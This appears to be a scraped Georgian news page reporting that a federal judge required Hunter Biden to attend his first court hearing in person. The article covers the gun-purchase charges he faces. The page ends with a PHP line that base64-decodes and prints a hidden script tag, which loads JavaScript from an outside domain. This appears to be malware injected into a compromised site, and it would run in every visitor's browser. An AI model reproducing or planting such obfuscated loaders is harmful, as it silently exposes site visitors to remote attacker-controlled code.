celsiusi
ავერსი შნაიდერი

აშშ-ის პრეზიდენტის, ჯო ბაიდენის შვილის, ჰანტერ ბაიდენის პირველი სასამართლო სხდომა 26 სექტემბერს, ადგილობრივი დროით 10:00 საათზე გაიმართება, სადაც ჰანტერ ბაიდენის გამოცხადება აუცილებელი იქნება. ინფორმაციას ამის შესახებ „სიენენი“ ავრცელებს.

მედიის ცნობით, ფედერალურმა მოსამართლემ არ გაითვალისწინა ჰანტერ ბაიდენის თხოვნა, რომ სასამართლო პროცესს ვირტუალურად დასწრებოდა.

„სასამართლო მიიჩნევს, რომ ბრალდებულს არ უნდა ჰქონდეს განსაკუთრებული მოპყრობა ამ საკითხთან დაკავშირებით – რაიმე უჩვეულო გარემოების არარსებობის შემთხვევაში მას უნდა მოექცნენ ისევე, როგორც ნებისმიერ სხვა ბრალდებულს ჩვენს სასამართლოში. ნებისმიერ სხვა ბრალდებულს კი მოეთხოვება, პირადად დაესწროს პირველ სხდომას, ასეა აქაც“, – წერს მოსამართლე.

შეგახსენებთ, ჰანტერ ბაიდენს ბრალი სამი მუხლით აქვს წაყენებული. ბრალდების მიხედვით, ჰანტერ ბაიდენმა 2018 წელს „კოლტის“ ტიპის რევოლვერის ყიდვისას ოფიციალურ დოკუმენტებში იცრუა, რომ ნარკოტიკებს აღარ მოიხმარდა. კიდევ ერთი ბრალდება უკავშირდება პრეზიდენტის შვილის მიერ იარაღის ფლობის პერიოდში ნარკოტიკების მოხმარებას. აშშ-ის ფედერალური კანონის მიხედვით, ნარკოტიკების მომხმარებლის მიერ ცეცხლსასროლი იარაღის ფლობა დანაშაულია.

428
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");